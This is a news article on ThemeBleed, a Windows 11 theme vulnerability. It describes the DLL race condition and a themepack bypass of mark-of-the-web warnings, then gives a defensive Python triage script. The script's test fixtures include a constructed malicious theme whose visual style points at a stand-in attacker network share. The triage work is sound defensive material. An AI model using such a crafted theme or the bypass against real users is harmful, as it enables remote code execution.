
ThemeBleed RCE bug discovered in Windows 11, proof-of-concept exploit published

A dangerous vulnerability in Windows 11 Themes opens the door to attackers

A vulnerability called ThemeBleed allows attackers to execute code on the system. Microsoft has patched the flaw, and users are advised to install the security updates.


Proof-of-concept exploit code has been published for a vulnerability in Windows Themes, tracked as CVE-2023-38146, that allows remote attackers to execute code on the system. The security issue, also known as ThemeBleed, has been assigned a high severity rating (CVSS 8.8). It can be exploited if the user opens a maliciously crafted .THEME file created by the attacker.

Details about ThemeBleed

The vulnerability was discovered by Gabe Kirkpatrick, one of the researchers who reported the issue to Microsoft on May 15. For reporting the flaw, Kirkpatrick received a $5,000 reward. CVE-2023-38146 was patched by Microsoft on September 12, as part of the September 2023 Patch Tuesday.

A flaw discovered via "weird Windows file formats"

Kirkpatrick found the vulnerability while examining "strange Windows file formats", including the .THEME format used to customize the look of the operating system. A .THEME file references a '.msstyles' file, which is supposed to contain only graphic resources and is loaded when the theme file is opened.

Exploitation method and solution

According to the researcher, when the .MSSTYLES file declares version number "999", the code that handles it verifies the signature of an accompanying DLL ("_vrf.dll") and only afterwards loads it; the gap between the check and the load is a time-of-check/time-of-use race condition. With a specially crafted .MSSTYLES file, an attacker who can swap the file within that window replaces the DLL that passed verification with a malicious one, which is then loaded and executes arbitrary code on the target machine.

Microsoft fixed the problem by removing the "version 999" functionality altogether. Kirkpatrick notes, however, that the underlying race condition between signature verification and DLL loading has not been addressed.

The researcher also points out that a theme file downloaded from the web carries the "mark-of-the-web", so opening it triggers a security warning that can alert the user. This warning can be bypassed by wrapping the theme in a .THEMEPACK file, a CAB archive: when the .THEMEPACK is opened, the theme inside is applied automatically without any "mark-of-the-web" warning. Microsoft has not, at the time of writing, addressed the missing "mark-of-the-web" warning for themepack files.

Windows users are advised to install Microsoft's September 2023 security updates as soon as possible: besides ThemeBleed, they address two zero-day vulnerabilities under active exploitation and 57 other security issues in various applications and system components.
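A practical follow-up to the description above is a triage check for .theme files that arrive by mail or download. The script below is an added example written for this page; it is not the researcher's proof of concept nor any Microsoft code. It parses the INI-style .theme text, pulls the .msstyles reference out of the [VisualStyles] section, and flags the two indicators the article describes: a visual style loaded from somewhere other than the built-in Windows theme directory (for instance a network share, where an attacker could swap the file during the race window), and a companion DLL next to the .msstyles. The "<name>.msstyles_vrf.dll" naming, the trusted directory, the %SystemRoot%/%ResourceDir% defaults and the two theme samples are assumptions constructed for the example; the directory listing is passed in as a list so the check runs offline.

```python
"""Offline triage of Windows .theme files for ThemeBleed-style indicators (added example)."""
import configparser
import ntpath
import re

# Where Windows ships its own visual styles (assumed layout); anything outside deserves a look.
TRUSTED_THEME_DIR = r"C:\Windows\Resources\Themes"

# Assumed default values for the environment variables .theme files commonly use.
DEFAULT_ENV = {"SystemRoot": r"C:\Windows", "ResourceDir": r"C:\Windows\Resources"}


def expand_env(path: str, env: dict = DEFAULT_ENV) -> str:
    """Expand %VAR% references case-insensitively, as the Windows shell would."""
    lower_env = {k.lower(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: lower_env.get(m.group(1).lower(), m.group(0)), path)


def msstyles_path(theme_text: str):
    """Return the Path= value of the [VisualStyles] section, or None if the theme has none."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case as written in the file
    cp.read_string(theme_text)
    for section in cp.sections():
        if section.lower() == "visualstyles":
            for key, value in cp.items(section):
                if key.lower() == "path":
                    return value.strip()
    return None


def is_unc(path: str) -> bool:
    """True for \\\\server\\share style paths, i.e. a file the attacker can change at will."""
    drive, _ = ntpath.splitdrive(path)
    return drive.startswith("\\\\")


def inside_trusted_dir(path: str) -> bool:
    """True when the (expanded) path lies under the built-in theme directory."""
    norm = ntpath.normcase(ntpath.normpath(path))
    root = ntpath.normcase(ntpath.normpath(TRUSTED_THEME_DIR)) + "\\"
    return norm.startswith(root)


def triage(theme_text: str, dir_listing=()) -> list:
    """Return human-readable findings for one .theme file plus the listing of its msstyles folder."""
    findings = []
    raw = msstyles_path(theme_text)
    if raw is None:
        return findings  # no visual style referenced, nothing gets loaded
    path = expand_env(raw)
    if is_unc(path):
        findings.append(f"msstyles loaded from a network share: {path}")
    elif not inside_trusted_dir(path):
        findings.append(f"msstyles outside {TRUSTED_THEME_DIR}: {path}")
    # Companion DLL that the "version 999" code path signature-checks and then loads
    # (assumed naming: the msstyles file name with "_vrf.dll" appended).
    vrf_name = ntpath.basename(path).lower() + "_vrf.dll"
    if any(name.lower() == vrf_name for name in dir_listing):
        findings.append(f"companion verification DLL present next to the msstyles: {vrf_name}")
    return findings


# Constructed sample: how a stock Windows theme references its visual style.
BENIGN_THEME = r"""
; constructed sample, not a real shipped file
[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2013

[VisualStyles]
Path=%ResourceDir%\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Constructed sample: a theme that points its visual style at an attacker-controlled share.
MALICIOUS_THEME = r"""
; constructed sample, not a real exploit file
[Theme]
DisplayName=Totally Legit Theme

[VisualStyles]
Path=\\attacker.example\share\evil.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

if __name__ == "__main__":
    print("benign:", triage(BENIGN_THEME, ["Aero.msstyles"]))
    print("malicious:", triage(MALICIOUS_THEME, ["evil.msstyles", "evil.msstyles_vrf.dll"]))
```

The check deliberately treats any .msstyles outside the Windows theme directory as suspicious rather than trying to detect the "999" version marker inside the PE file: the version field is the part Microsoft removed, while a visual style loaded from writable or remote storage is exactly what makes the remaining check-then-load race exploitable.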


09/14/2023 17:01

Editorial AI
